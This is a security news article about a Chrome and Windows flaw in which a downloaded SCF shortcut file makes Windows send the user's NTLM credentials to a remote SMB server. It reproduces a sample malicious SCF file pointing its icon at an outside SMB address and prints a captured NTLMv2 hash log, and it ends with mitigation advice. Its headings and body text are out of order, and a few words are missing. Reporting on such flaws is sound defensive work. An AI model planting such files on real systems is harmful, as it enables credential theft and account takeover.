Chrome + SCF + SMB = Stealing Windows Credentials

"Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim's authentication credentials," Stankovic wrote in a blog post, describing the flaw.

[Shell]

Command=2

IconFile=explorer.exe,3

[Shell]

IconFile=\\170.170.170.170\icon

Exploiting LM/NTLM Hash Authentication via SCF File

Image Source: SANS

Windows users (client) attempts to log into a server.

The server responds with a challenge value, asking the user to encrypt the challenge value with his hash password and send it back.

Windows handles the SCF request by sending the client's username and hashed version of the password to the server.

The server then captures that response and approves authentication, if the client's hash password is correct.

[*] SMB Captured - 2017-05-15 13:10:44 +0200

NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182

USER:Bosko DOMAIN:Master OS: LM:

LMHASH:Disabled

LM_CLIENT_CHALLENGE:Disabled

NTHASH:98daf39c3a253bbe4a289e7a746d4b24

NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000

00000000000

Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

"It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings," the researcher said. "Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files."

No Need to Decrypt Password *Sometimes*

How to Prevent Such SMB Authentication-related Attacks

A security researcher has discovered a serious vulnerability in the default configuration of the latest version of Google's Chrome running on any version of Microsoft's Windows operating system, including Windows 10, that could allow remote hackers to steal user's login credentials.Researcher Bosko Stankovic of DefenseCode has found that just by visiting a website containing a malicious SCF file could allow victims to unknowingly share their computer's login credentials with hackers via Chrome and the SMB protocol.This technique is not new and was exploited by the— a powerful malware that specially designed to destroy Iran's nuclear program — that used the Windows shortcut LNK files to compromise systems.What's make this attack different from others is the fact that such SMB authentication related attacks have been first time demonstrated on Google Chrome publicly, after Internet Explorer (IE) and Edge.SCF (Shell Command File) shortcut file format works similar as LNK files and is designed to support a limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin.Basically, shortcut links on your desktop are a text file with a specific syntax of shell code that defines the location of icon/thumbnail, application's name and it's location.Since Chrome trusts Windows SCF files, attackers can trick victims into visiting their website containing a maliciously crafted shortcut file, which gets downloaded automatically onto the target systems without prompting confirmation from the users.As soon as the user opens the folder containing that downloaded file, immediately or later, this file automatically runs to retrieve an icon without the user having to click on it.But instead of setting the location of an icon image, the malicious SCF file created by the attacker contain the location of a remote SMB server (controlled by the attacker).So, as soon as the SCF file attempts to retrieve the icon image, it will trick into making an automatic authentication with the attacker's controlled remote server over SMB protocol, handing over the victim's username and hashed version of password, allowing the attacker to use your credentials to authenticate to your personal computer or network resource."Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares," Stankovic said.But following the Stuxnet attacks, Microsoft forced LNK files to load their icons only from local resources so they'd no longer be vulnerable to such attacks which make them load malicious code from outside servers.However, SCF files were left alone.But why would your Windows PC automatically hand over your credentials to the server?If you are unaware, this is how authentication via the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response authentication mechanism.In short, LM/NTLM authentication works in 4 steps:Now, in the SCF attack scenario, elaborated by Stankovic, Windows will attempt to authenticate to the malicious SMB server automatically by providing the victim's username and NTLMv2 password hashes (a personal computer or network resource) to the server, as described in above-mentioned step 3.If the user is part of a corporate network, the network credentials assigned to the user by his company's sysadmin will be sent to the attacker.If the victim is a home user, the victim's Windows username and password will be sent to the attacker.No doubt, the credentials are encrypted but can be "brute-forced" later to retrieve original login password in plain text.Since a number of Microsoft services accept the password in its hashed form, the attacker can even use the encrypted password to login to your OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and other Microsoft services, making the decryption unnecessary.Such vulnerabilities, according to the researcher, could also pose a serious threat to large organizations as they enable attackers to impersonate one of their members, allowing attackers to immediately reuse gained privileges to further escalate access and gain access and control of their IT resources and perform attacks on other members.Simply, block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers can not query remote SMB servers.Stankovic also advises users to consider disabling automatic downloads in Google Chrome by going tooption.This change will allow you to manually approve each download attempt, which would significantly decrease the risk of credential theft attacks using SCF files.Google is aware of the vulnerability and is said to be working on a patch, but no timeframe has been given as to when the patch will be made available to the users.